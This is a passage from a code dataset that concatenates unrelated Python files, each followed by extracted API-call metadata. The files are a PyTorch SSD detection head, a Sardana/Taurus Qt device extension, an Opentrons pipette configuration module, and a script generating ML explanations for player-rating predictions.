return confidences, locations
def compute_header(self, i, x):
batch_size = self.batch_size or x.size(0)
confidence = self.classification_headers[i](x)
confidence = confidence.permute(0, 2, 3, 1).contiguous()
confidence = confidence.reshape(batch_size, -1, self.num_classes)
location = self.regression_headers[i](x)
location = location.permute(0, 2, 3, 1).contiguous()
location = location.reshape(batch_size, -1, 4)
return confidence, location
def load_backbone_weights(self, path):
self.backbone.load_state_dict(
torch.load(path, map_location=lambda storage, loc: storage),
strict=True)
def freeze_backbone(self):
for p in self.backbone.parameters():
p.requires_grad = False
class SSDInference(SSD):
def __init__(self, num_classes, backbone, arch_name,
batch_size=None, config=None):
super(SSDInference, self).__init__(num_classes, backbone, arch_name,
batch_size, config)
self.to_predictions = ToPredictions(self.config.priors,
self.config.center_variance,
self.config.size_variance)
def forward(self, x):
confidences, locations = super(SSDInference, self).forward(x)
confidences, boxes = self.to_predictions.forward(confidences, locations)
return confidences, boxes
| [
"torch.load",
"fpn.extension.Extension",
"detector.ssd.to_predictions.ToPredictions",
"torch.nn.Conv2d",
"nn.separable_conv_2d.SeparableConv2d",
"torch.cat"
] | [((705, 816), 'fpn.extension.Extension', 'Extension', ([], {'bootstrap_channels': 'feature_channels[-1]', 'out_channels': '[512, 256, 256, 64]', 'conv': 'SeparableConv2d'}), '(bootstrap_channels=feature_channels[-1], out_channels=[512, 256, \n 256, 64], conv=SeparableConv2d)\n', (714, 816), False, 'from fpn.extension import Extension\n'), ((2943, 2968), 'torch.cat', 'torch.cat', (['confidences', '(1)'], {}), '(confidences, 1)\n', (2952, 2968), False, 'import torch\n'), ((2983, 3006), 'torch.cat', 'torch.cat', (['locations', '(1)'], {}), '(locations, 1)\n', (2992, 3006), False, 'import torch\n'), ((4002, 4096), 'detector.ssd.to_predictions.ToPredictions', 'ToPredictions', (['self.config.priors', 'self.config.center_variance', 'self.config.size_variance'], {}), '(self.config.priors, self.config.center_variance, self.config.\n size_variance)\n', (4015, 4096), False, 'from detector.ssd.to_predictions import ToPredictions\n'), ((3551, 3610), 'torch.load', 'torch.load', (['path'], {'map_location': '(lambda storage, loc: storage)'}), '(path, map_location=lambda storage, loc: storage)\n', (3561, 3610), False, 'import torch\n'), ((874, 983), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': 'feature_channels[-2]', 'out_channels': '(6 * num_classes)', 'kernel_size': '(3)', 'padding': '(1)'}), '(in_channels=feature_channels[-2], out_channels=6 *\n num_classes, kernel_size=3, padding=1)\n', (889, 983), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1022, 1131), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': 'feature_channels[-1]', 'out_channels': '(6 * num_classes)', 'kernel_size': '(3)', 'padding': '(1)'}), '(in_channels=feature_channels[-1], out_channels=6 *\n num_classes, kernel_size=3, padding=1)\n', (1037, 1131), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1170, 1263), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': '(512)', 'out_channels': '(6 * num_classes)', 'kernel_size': '(3)', 'padding': '(1)'}), '(in_channels=512, out_channels=6 * num_classes, kernel_size=\n 3, padding=1)\n', (1185, 1263), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1282, 1375), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': '(256)', 'out_channels': '(6 * num_classes)', 'kernel_size': '(3)', 'padding': '(1)'}), '(in_channels=256, out_channels=6 * num_classes, kernel_size=\n 3, padding=1)\n', (1297, 1375), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1394, 1487), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': '(256)', 'out_channels': '(6 * num_classes)', 'kernel_size': '(3)', 'padding': '(1)'}), '(in_channels=256, out_channels=6 * num_classes, kernel_size=\n 3, padding=1)\n', (1409, 1487), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1506, 1576), 'torch.nn.Conv2d', 'nn.Conv2d', ([], {'in_channels': '(64)', 'out_channels': '(6 * num_classes)', 'kernel_size': '(1)'}), '(in_channels=64, out_channels=6 * num_classes, kernel_size=1)\n', (1515, 1576), True, 'import torch.nn as nn\n'), ((1644, 1766), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': 'feature_channels[-2]', 'out_channels': '(6 * 4)', 'kernel_size': '(3)', 'padding': '(1)', 'onnx_compatible': '(False)'}), '(in_channels=feature_channels[-2], out_channels=6 * 4,\n kernel_size=3, padding=1, onnx_compatible=False)\n', (1659, 1766), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1805, 1927), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': 'feature_channels[-1]', 'out_channels': '(6 * 4)', 'kernel_size': '(3)', 'padding': '(1)', 'onnx_compatible': '(False)'}), '(in_channels=feature_channels[-1], out_channels=6 * 4,\n kernel_size=3, padding=1, onnx_compatible=False)\n', (1820, 1927), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1966, 2072), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': '(512)', 'out_channels': '(6 * 4)', 'kernel_size': '(3)', 'padding': '(1)', 'onnx_compatible': '(False)'}), '(in_channels=512, out_channels=6 * 4, kernel_size=3, padding\n =1, onnx_compatible=False)\n', (1981, 2072), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((2091, 2197), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': '(256)', 'out_channels': '(6 * 4)', 'kernel_size': '(3)', 'padding': '(1)', 'onnx_compatible': '(False)'}), '(in_channels=256, out_channels=6 * 4, kernel_size=3, padding\n =1, onnx_compatible=False)\n', (2106, 2197), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((2216, 2322), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': '(256)', 'out_channels': '(6 * 4)', 'kernel_size': '(3)', 'padding': '(1)', 'onnx_compatible': '(False)'}), '(in_channels=256, out_channels=6 * 4, kernel_size=3, padding\n =1, onnx_compatible=False)\n', (2231, 2322), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((2341, 2401), 'torch.nn.Conv2d', 'nn.Conv2d', ([], {'in_channels': '(64)', 'out_channels': '(6 * 4)', 'kernel_size': '(1)'}), '(in_channels=64, out_channels=6 * 4, kernel_size=1)\n', (2350, 2401), True, 'import torch.nn as nn\n')] |
#!/usr/bin/env python
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
"""Device pool extension for taurus Qt"""
__all__ = ["QPool", "QMeasurementGroup",
"registerExtensions"]
import json
from taurus.external.qt import Qt
from taurus.core.taurusbasetypes import TaurusEventType
from taurus.core.tango import TangoDevice
CHANGE_EVTS = TaurusEventType.Change, TaurusEventType.Periodic
class QPool(Qt.QObject, TangoDevice):
def __init__(self, name='', qt_parent=None, **kw):
self.call__init__(TangoDevice, name, **kw)
self.call__init__wo_kw(Qt.QObject, qt_parent)
class QMeasurementGroup(Qt.QObject, TangoDevice):
configurationChanged = Qt.pyqtSignal()
def __init__(self, name='', qt_parent=None, **kw):
self.call__init__(TangoDevice, name, **kw)
self.call__init__wo_kw(Qt.QObject, qt_parent)
self._config = None
self.__configuration = self.getAttribute("Configuration")
self.__configuration.addListener(self._configurationChanged)
def __getattr__(self, name):
try:
return Qt.QObject.__getattr__(self, name)
except AttributeError:
return TangoDevice.__getattr__(self, name)
def _configurationChanged(self, s, t, v):
if t == TaurusEventType.Config:
return
if TaurusEventType.Error:
self._config = None
else:
self._config = json.loads(v.value)
self.configurationChanged.emit()
def getConfiguration(self, cache=True):
if self._config is None or not cache:
try:
v = self.read_attribute("configuration")
self._config = json.loads(v.value)
except:
self._config = None
return self._config
def setConfiguration(self, config):
self.write_attribute("configuration", json.dumps(config))
def registerExtensions():
"""Registers the pool extensions in the :class:`taurus.core.tango.TangoFactory`"""
import taurus
#import sardana.taurus.core.tango.sardana.pool
# sardana.taurus.core.tango.sardana.pool.registerExtensions()
factory = taurus.Factory()
#factory.registerDeviceClass('Pool', QPool)
factory.registerDeviceClass('MeasurementGroup', QMeasurementGroup)
| [
"taurus.Factory",
"json.loads",
"taurus.core.tango.TangoDevice.__getattr__",
"json.dumps",
"taurus.external.qt.Qt.QObject.__getattr__",
"taurus.external.qt.Qt.pyqtSignal"
] | [((1575, 1590), 'taurus.external.qt.Qt.pyqtSignal', 'Qt.pyqtSignal', ([], {}), '()\n', (1588, 1590), False, 'from taurus.external.qt import Qt\n'), ((3048, 3064), 'taurus.Factory', 'taurus.Factory', ([], {}), '()\n', (3062, 3064), False, 'import taurus\n'), ((1982, 2016), 'taurus.external.qt.Qt.QObject.__getattr__', 'Qt.QObject.__getattr__', (['self', 'name'], {}), '(self, name)\n', (2004, 2016), False, 'from taurus.external.qt import Qt\n'), ((2316, 2335), 'json.loads', 'json.loads', (['v.value'], {}), '(v.value)\n', (2326, 2335), False, 'import json\n'), ((2764, 2782), 'json.dumps', 'json.dumps', (['config'], {}), '(config)\n', (2774, 2782), False, 'import json\n'), ((2067, 2102), 'taurus.core.tango.TangoDevice.__getattr__', 'TangoDevice.__getattr__', (['self', 'name'], {}), '(self, name)\n', (2090, 2102), False, 'from taurus.core.tango import TangoDevice\n'), ((2573, 2592), 'json.loads', 'json.loads', (['v.value'], {}), '(v.value)\n', (2583, 2592), False, 'import json\n')] |
import logging
import os
import json
from collections import namedtuple
from opentrons.config import get_config_index
FILE_DIR = os.path.abspath(os.path.dirname(__file__))
log = logging.getLogger(__name__)
def pipette_config_path():
index = get_config_index()
return index.get('pipetteConfigFile', './settings.json')
pipette_config = namedtuple(
'pipette_config',
[
'plunger_positions',
'pick_up_current',
'aspirate_flow_rate',
'dispense_flow_rate',
'ul_per_mm',
'channels',
'name',
'model_offset',
'plunger_current',
'drop_tip_current',
'tip_length' # TODO (andy): remove from pipette, move to tip-rack
]
)
def _create_config_from_dict(cfg: dict, model: str) -> pipette_config:
def _dict_key_to_config_attribute(key: str) -> str:
'''
Converts the JSON key syntax (eg: "plungerPositions"), to the format
used in the namedtuple `plunger_config` (eg: "plunger_positions")
'''
return ''.join([
'_{}'.format(c.lower()) if c.isupper() else c
for c in key
])
def _load_config_value(config_dict: dict, key: str):
'''
Retrieves a given key from the loaded JSON config dict. If that key is
not present in the dictionary, it falls back to the value from
the namedtuple `plunger_config`, named "fallback"
'''
nonlocal model
fallback_cfg = fallback_configs.get(model)
fallback_key = _dict_key_to_config_attribute(key)
fallback_value = getattr(fallback_cfg, fallback_key)
return config_dict.get(key, fallback_value)
res = None
try:
plunger_pos = _load_config_value(cfg, 'plungerPositions')
res = pipette_config(
plunger_positions={
'top': plunger_pos['top'],
'bottom': plunger_pos['bottom'],
'blow_out': plunger_pos.get(
'blowOut', plunger_pos.get('blow_out')),
'drop_tip': plunger_pos.get(
'dropTip', plunger_pos.get('drop_tip')),
},
pick_up_current=_load_config_value(cfg, 'pickUpCurrent'),
aspirate_flow_rate=_load_config_value(
cfg, 'aspirateFlowRate'),
dispense_flow_rate=_load_config_value(
cfg, 'dispenseFlowRate'),
ul_per_mm=_load_config_value(cfg, 'ulPerMm'),
channels=_load_config_value(cfg, 'channels'),
name=model,
model_offset=_load_config_value(cfg, 'modelOffset'),
plunger_current=_load_config_value(cfg, 'plungerCurrent'),
drop_tip_current=_load_config_value(cfg, 'dropTipCurrent'),
tip_length=_load_config_value(cfg, 'tipLength')
)
except (KeyError, json.decoder.JSONDecodeError) as e:
log.error('Error when loading pipette config: {}'.format(e))
return res
def _load_config_dict_from_file(pipette_model: str) -> dict:
config_file = pipette_config_path()
cfg = {}
if os.path.exists(config_file):
with open(config_file) as conf:
all_configs = json.load(conf)
cfg = all_configs[pipette_model]
return cfg
# ------------------------- deprecated data ---------------------------
# This section is left in as a fall-back until the settings file is
# available on all robots. Currently, getting the settings file onto
# the robots requires a Resin push, which involves some pain to users
# because it restarts the robot--even if a protocol run is in progress.
# The preferred solution is to implement a server endpoint that will
# accept a data packet and save it in the robot, the same way that API
# server updates are currently done. Once that is in place, the app can
# ship the required data to the robot and this fallback data can be
# removed from server code. Delete from here to "end deprecated data"
# below, and remove the `select_config` call from the `config` dict
# comprehension.
DISTANCE_BETWEEN_NOZZLES = 9
NUM_MULTI_CHANNEL_NOZZLES = 8
MULTI_LENGTH = (NUM_MULTI_CHANNEL_NOZZLES - 1) * DISTANCE_BETWEEN_NOZZLES
Y_OFFSET_MULTI = MULTI_LENGTH / 2
Z_OFFSET_MULTI = -25.8
Z_OFFSET_P10 = -13 # longest single-channel pipette
Z_OFFSET_P50 = 0
Z_OFFSET_P300 = 0
Z_OFFSET_P1000 = 20 # shortest single-channel pipette
DEFAULT_ASPIRATE_SECONDS = 2
DEFAULT_DISPENSE_SECONDS = 1
# TODO (ben 20180511): should we read these values from
# TODO /shared-data/robot-data/pipette-config.json ? Unclear,
# TODO because this is the backup in case that behavior fails,
# TODO but we could make it more reliable if we start bundling
# TODO config data into the wheel file perhaps. Needs research.
p10_single = pipette_config(
plunger_positions={
'top': 19,
'bottom': 2.5,
'blow_out': -0.5,
'drop_tip': -4
},
pick_up_current=0.1,
aspirate_flow_rate=10 / DEFAULT_ASPIRATE_SECONDS,
dispense_flow_rate=10 / DEFAULT_DISPENSE_SECONDS,
ul_per_mm=0.77,
channels=1,
name='p10_single_v1',
model_offset=[0.0, 0.0, Z_OFFSET_P10],
plunger_current=0.3,
drop_tip_current=0.5,
tip_length=33
)
p10_multi = pipette_config(
plunger_positions={
'top': 19,
'bottom': 4,
'blow_out': 1,
'drop_tip': -4.5
},
pick_up_current=0.2,
aspirate_flow_rate=10 / DEFAULT_ASPIRATE_SECONDS,
dispense_flow_rate=10 / DEFAULT_DISPENSE_SECONDS,
ul_per_mm=0.77,
channels=8,
name='p10_multi_v1',
model_offset=[0.0, Y_OFFSET_MULTI, Z_OFFSET_MULTI],
plunger_current=0.5,
drop_tip_current=0.5,
tip_length=33
)
p50_single = pipette_config(
plunger_positions={
'top': 19,
'bottom': 2.5,
'blow_out': 2,
'drop_tip': -5
},
pick_up_current=0.1,
aspirate_flow_rate=50 / DEFAULT_ASPIRATE_SECONDS,
dispense_flow_rate=50 / DEFAULT_DISPENSE_SECONDS,
ul_per_mm=3.35,
channels=1,
name='p50_single_v1',
model_offset=[0.0, 0.0, Z_OFFSET_P50],
plunger_current=0.3,
drop_tip_current=0.5,
tip_length=51.7
)
p50_multi = pipette_config(
plunger_positions={
'top': 19,
'bottom': 2.5,
'blow_out': 2,
'drop_tip': -4
},
pick_up_current=0.3,
aspirate_flow_rate=50 / DEFAULT_ASPIRATE_SECONDS,
dispense_flow_rate=50 / DEFAULT_DISPENSE_SECONDS,
ul_per_mm=3.35,
channels=8,
name='p50_multi_v1',
model_offset=[0.0, Y_OFFSET_MULTI, Z_OFFSET_MULTI],
plunger_current=0.5,
drop_tip_current=0.5,
tip_length=51.7
)
p300_single = pipette_config(
plunger_positions={
'top': 19,
'bottom': 2.5,
'blow_out': 1,
'drop_tip': -5
},
pick_up_current=0.1,
aspirate_flow_rate=300 / DEFAULT_ASPIRATE_SECONDS,
dispense_flow_rate=300 / DEFAULT_DISPENSE_SECONDS,
ul_per_mm=18.7,
channels=1,
name='p300_single_v1',
model_offset=[0.0, 0.0, Z_OFFSET_P300],
plunger_current=0.3,
drop_tip_current=0.5,
tip_length=51.7
)
p300_multi = pipette_config(
plunger_positions={
'top': 19,
'bottom': 3,
'blow_out': 1,
'drop_tip': -3.5
},
pick_up_current=0.3,
aspirate_flow_rate=300 / DEFAULT_ASPIRATE_SECONDS,
dispense_flow_rate=300 / DEFAULT_DISPENSE_SECONDS,
ul_per_mm=19,
channels=8,
name='p300_multi_v1',
model_offset=[0.0, Y_OFFSET_MULTI, Z_OFFSET_MULTI],
plunger_current=0.5,
drop_tip_current=0.5,
tip_length=51.7
)
p1000_single = pipette_config(
plunger_positions={
'top': 19,
'bottom': 3,
'blow_out': 1,
'drop_tip': -5
},
pick_up_current=0.1,
aspirate_flow_rate=1000 / DEFAULT_ASPIRATE_SECONDS,
dispense_flow_rate=1000 / DEFAULT_DISPENSE_SECONDS,
ul_per_mm=65,
channels=1,
name='p1000_single_v1',
model_offset=[0.0, 0.0, Z_OFFSET_P1000],
plunger_current=0.5,
drop_tip_current=0.5,
tip_length=76.7
)
fallback_configs = {
'p10_single_v1': p10_single,
'p10_multi_v1': p10_multi,
'p50_single_v1': p50_single,
'p50_multi_v1': p50_multi,
'p300_single_v1': p300_single,
'p300_multi_v1': p300_multi,
'p1000_single_v1': p1000_single
}
def select_config(model: str):
cfg_dict = _load_config_dict_from_file(model)
cfg = _create_config_from_dict(cfg_dict, model)
if not cfg:
cfg = fallback_configs.get(model)
return cfg
# ----------------------- end deprecated data -------------------------
# Notes:
# - multi-channel pipettes share the same dimensional offsets
# - single-channel pipettes have different lengths
# - Default number of seconds to aspirate/dispense a pipette's full volume,
# and these times were chosen to mimic normal human-pipetting motions.
# However, accurate speeds are dependent on environment (ex: liquid
# viscosity), therefore a pipette's flow-rates (ul/sec) should be set by
# protocol writer
# model-specific ID's, saved with each Pipette's memory
# used to identifiy what model pipette is currently connected to machine
PIPETTE_MODEL_IDENTIFIERS = {
'single': {
'10': 'p10_single_v1',
'50': 'p50_single_v1',
'300': 'p300_single_v1',
'1000': 'p1000_single_v1'
},
'multi': {
'10': 'p10_multi_v1',
'50': 'p50_multi_v1',
'300': 'p300_multi_v1',
}
}
configs = {
model: select_config(model)
for model in [
'p10_single_v1',
'p10_multi_v1',
'p50_single_v1',
'p50_multi_v1',
'p300_single_v1',
'p300_multi_v1',
'p1000_single_v1']}
def load(pipette_model: str) -> pipette_config:
"""
Lazily loads pipette config data from disk. This means that changes to the
configuration data should be picked up on newly instantiated objects
without requiring a restart. If :param pipette_model is not in the top-
level keys of the "pipette-config.json" file, this function will raise a
KeyError
:param pipette_model: a pipette model string corresponding to a top-level
key in the "pipette-config.json" file
:return: a `pipette_config` instance
"""
return select_config(pipette_model)
| [
"logging.getLogger",
"os.path.exists",
"collections.namedtuple",
"os.path.dirname",
"opentrons.config.get_config_index",
"json.load"
] | [((180, 207), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (197, 207), False, 'import logging\n'), ((348, 576), 'collections.namedtuple', 'namedtuple', (['"""pipette_config"""', "['plunger_positions', 'pick_up_current', 'aspirate_flow_rate',\n 'dispense_flow_rate', 'ul_per_mm', 'channels', 'name', 'model_offset',\n 'plunger_current', 'drop_tip_current', 'tip_length']"], {}), "('pipette_config', ['plunger_positions', 'pick_up_current',\n 'aspirate_flow_rate', 'dispense_flow_rate', 'ul_per_mm', 'channels',\n 'name', 'model_offset', 'plunger_current', 'drop_tip_current',\n 'tip_length'])\n", (358, 576), False, 'from collections import namedtuple\n'), ((146, 171), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (161, 171), False, 'import os\n'), ((249, 267), 'opentrons.config.get_config_index', 'get_config_index', ([], {}), '()\n', (265, 267), False, 'from opentrons.config import get_config_index\n'), ((3107, 3134), 'os.path.exists', 'os.path.exists', (['config_file'], {}), '(config_file)\n', (3121, 3134), False, 'import os\n'), ((3202, 3217), 'json.load', 'json.load', (['conf'], {}), '(conf)\n', (3211, 3217), False, 'import json\n')] |
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 28 17:16:29 2020
@author: mauro
"""
import logging
import os
from explanation import (
CounterfactualExplanation,
PermutationExplanation,
ShapleyExplanation,
SurrogateModelExplanation,
ControlGroupExplanation
)
from src.model.config import path_base
from src.model.DataConfig import DataConfig
from src.model.utils import (
average_the_ratings,
get_dataset,
load_pickle,
map_index_to_sample,
shuffle_in_unison,
experiment_setup,
create_treatment_dataframe
)
from src.explanation.surrogate_manual import run
logger = logging.getLogger(__file__)
logger.setLevel(logging.DEBUG)
path_config = os.path.join(path_base, "src", "resources")
path_load = os.path.join(path_base, "dataset", "training")
path_model_base = os.path.join(path_base, "model")
data = DataConfig(path_config)
data_config = data.load_config()
def print_output(sample, output):
score_text, method_text, explanation_text = output
separator = '---' * 20
print(sample)
print(separator)
print(score_text)
print(separator)
print(method_text)
print(separator)
print(explanation_text)
print("\n")
def find_winner(X, y):
y_pred = model.predict(X.values)
y_winner = y.copy()
y_winner['y_pred'] = y_pred
y_winner.reset_index(inplace=True)
index_winner = y_winner['y_pred'].argmax()
df_winner = y_winner.iloc[index_winner]
return df_winner
for field in ['all']:
model_name = [name for name in os.listdir(path_model_base) if field in name][-1]
print(model_name)
path_model = os.path.join(path_model_base, model_name)
path_save = os.path.join(os.path.dirname(os.getcwd()), "reports", field)
config = data_config[field]
config["folder"] = field
model = load_pickle(
path_model=path_model,
model_name="XGBRegressor.pickle",
)
X, y = get_dataset(
path_load=path_load,
name=data_config["dataset"],
target=config["target"],
features=config["features"],
)
new_name = f"{field}.player.rating"
y = average_the_ratings(y, list(y), new_name)
df_winner = find_winner(X, y)
df_winner.to_csv(
os.path.join(path_save, 'winner.csv'),
sep=";",
encoding="utf-8-sig"
)
print(X.loc[df_winner['Entry ID']].tolist())
# remove winner
X.drop(df_winner['Entry ID'], inplace=True)
y.drop(df_winner['Entry ID'], inplace=True)
X, y = shuffle_in_unison(X, y)
samples_dict = experiment_setup(X)
df_treatment = create_treatment_dataframe(samples_dict)
df_treatment.to_csv(
os.path.join(path_save, 'treatment_groups.csv'),
sep=";",
encoding="utf-8-sig",
)
# control group
for samples, sparse, show_rating in samples_dict["control_group"]:
control = ControlGroupExplanation(X, y, model, sparse, show_rating, config)
for sample in samples:
sample_index = map_index_to_sample(X, sample)
output = control.main(sample_index, sample)
print(sparse, show_rating)
print_output(sample, output)
# Global, Non-contrastive
for samples, sparse, show_rating in samples_dict["permutation"]:
permutation = PermutationExplanation(
X, y, model, sparse, show_rating, config
)
for sample in samples:
sample_index = map_index_to_sample(X, sample)
output = permutation.main(sample_index, sample)
print(sparse, show_rating)
print_output(sample, output)
# Local, Non-contrastive
for samples, sparse, show_rating in samples_dict["shapley"]:
shapely = ShapleyExplanation(X, y, model, sparse, show_rating, config)
for sample in samples:
sample_index = map_index_to_sample(X, sample)
output = shapely.main(sample_index, sample)
print(sparse, show_rating)
print_output(sample, output)
# Global, Contrastive
for samples, sparse, show_rating in samples_dict["surrogate"]:
surrogate = SurrogateModelExplanation(
X, y, model, sparse, show_rating, config
)
for sample in samples:
sample_index = map_index_to_sample(X, sample)
output = surrogate.main(sample_index, sample)
print(sparse, show_rating)
print_output(sample, output)
# Local, Contrastive
for samples, sparse, show_rating in samples_dict["counterfactual"]:
counterfactual = CounterfactualExplanation(
X, y, model, sparse, show_rating, config, y_desired=8.
)
for sample in samples:
sample_index = map_index_to_sample(X, sample)
output = counterfactual.main(sample_index, sample)
print(sparse, show_rating)
print_output(sample, output)
| [
"logging.getLogger",
"explanation.ShapleyExplanation",
"explanation.PermutationExplanation",
"os.listdir",
"src.model.utils.create_treatment_dataframe",
"explanation.SurrogateModelExplanation",
"src.model.utils.get_dataset",
"os.path.join",
"src.model.DataConfig.DataConfig",
"src.model.utils.exper... | [((619, 646), 'logging.getLogger', 'logging.getLogger', (['__file__'], {}), '(__file__)\n', (636, 646), False, 'import logging\n'), ((694, 737), 'os.path.join', 'os.path.join', (['path_base', '"""src"""', '"""resources"""'], {}), "(path_base, 'src', 'resources')\n", (706, 737), False, 'import os\n'), ((750, 796), 'os.path.join', 'os.path.join', (['path_base', '"""dataset"""', '"""training"""'], {}), "(path_base, 'dataset', 'training')\n", (762, 796), False, 'import os\n'), ((815, 847), 'os.path.join', 'os.path.join', (['path_base', '"""model"""'], {}), "(path_base, 'model')\n", (827, 847), False, 'import os\n'), ((856, 879), 'src.model.DataConfig.DataConfig', 'DataConfig', (['path_config'], {}), '(path_config)\n', (866, 879), False, 'from src.model.DataConfig import DataConfig\n'), ((1639, 1680), 'os.path.join', 'os.path.join', (['path_model_base', 'model_name'], {}), '(path_model_base, model_name)\n', (1651, 1680), False, 'import os\n'), ((1838, 1906), 'src.model.utils.load_pickle', 'load_pickle', ([], {'path_model': 'path_model', 'model_name': '"""XGBRegressor.pickle"""'}), "(path_model=path_model, model_name='XGBRegressor.pickle')\n", (1849, 1906), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((1942, 2062), 'src.model.utils.get_dataset', 'get_dataset', ([], {'path_load': 'path_load', 'name': "data_config['dataset']", 'target': "config['target']", 'features': "config['features']"}), "(path_load=path_load, name=data_config['dataset'], target=config\n ['target'], features=config['features'])\n", (1953, 2062), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((2557, 2580), 'src.model.utils.shuffle_in_unison', 'shuffle_in_unison', (['X', 'y'], {}), '(X, y)\n', (2574, 2580), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((2613, 2632), 'src.model.utils.experiment_setup', 'experiment_setup', (['X'], {}), '(X)\n', (2629, 2632), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((2653, 2693), 'src.model.utils.create_treatment_dataframe', 'create_treatment_dataframe', (['samples_dict'], {}), '(samples_dict)\n', (2679, 2693), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((2265, 2302), 'os.path.join', 'os.path.join', (['path_save', '"""winner.csv"""'], {}), "(path_save, 'winner.csv')\n", (2277, 2302), False, 'import os\n'), ((2728, 2775), 'os.path.join', 'os.path.join', (['path_save', '"""treatment_groups.csv"""'], {}), "(path_save, 'treatment_groups.csv')\n", (2740, 2775), False, 'import os\n'), ((2942, 3007), 'explanation.ControlGroupExplanation', 'ControlGroupExplanation', (['X', 'y', 'model', 'sparse', 'show_rating', 'config'], {}), '(X, y, model, sparse, show_rating, config)\n', (2965, 3007), False, 'from explanation import CounterfactualExplanation, PermutationExplanation, ShapleyExplanation, SurrogateModelExplanation, ControlGroupExplanation\n'), ((3363, 3427), 'explanation.PermutationExplanation', 'PermutationExplanation', (['X', 'y', 'model', 'sparse', 'show_rating', 'config'], {}), '(X, y, model, sparse, show_rating, config)\n', (3385, 3427), False, 'from explanation import CounterfactualExplanation, PermutationExplanation, ShapleyExplanation, SurrogateModelExplanation, ControlGroupExplanation\n'), ((3792, 3852), 'explanation.ShapleyExplanation', 'ShapleyExplanation', (['X', 'y', 'model', 'sparse', 'show_rating', 'config'], {}), '(X, y, model, sparse, show_rating, config)\n', (3810, 3852), False, 'from explanation import CounterfactualExplanation, PermutationExplanation, ShapleyExplanation, SurrogateModelExplanation, ControlGroupExplanation\n'), ((4192, 4259), 'explanation.SurrogateModelExplanation', 'SurrogateModelExplanation', (['X', 'y', 'model', 'sparse', 'show_rating', 'config'], {}), '(X, y, model, sparse, show_rating, config)\n', (4217, 4259), False, 'from explanation import CounterfactualExplanation, PermutationExplanation, ShapleyExplanation, SurrogateModelExplanation, ControlGroupExplanation\n'), ((4657, 4743), 'explanation.CounterfactualExplanation', 'CounterfactualExplanation', (['X', 'y', 'model', 'sparse', 'show_rating', 'config'], {'y_desired': '(8.0)'}), '(X, y, model, sparse, show_rating, config,\n y_desired=8.0)\n', (4682, 4743), False, 'from explanation import CounterfactualExplanation, PermutationExplanation, ShapleyExplanation, SurrogateModelExplanation, ControlGroupExplanation\n'), ((1730, 1741), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1739, 1741), False, 'import os\n'), ((3066, 3096), 'src.model.utils.map_index_to_sample', 'map_index_to_sample', (['X', 'sample'], {}), '(X, sample)\n', (3085, 3096), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((3508, 3538), 'src.model.utils.map_index_to_sample', 'map_index_to_sample', (['X', 'sample'], {}), '(X, sample)\n', (3527, 3538), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((3911, 3941), 'src.model.utils.map_index_to_sample', 'map_index_to_sample', (['X', 'sample'], {}), '(X, sample)\n', (3930, 3941), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((4352, 4382), 'src.model.utils.map_index_to_sample', 'map_index_to_sample', (['X', 'sample'], {}), '(X, sample)\n', (4371, 4382), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((4831, 4861), 'src.model.utils.map_index_to_sample', 'map_index_to_sample', (['X', 'sample'], {}), '(X, 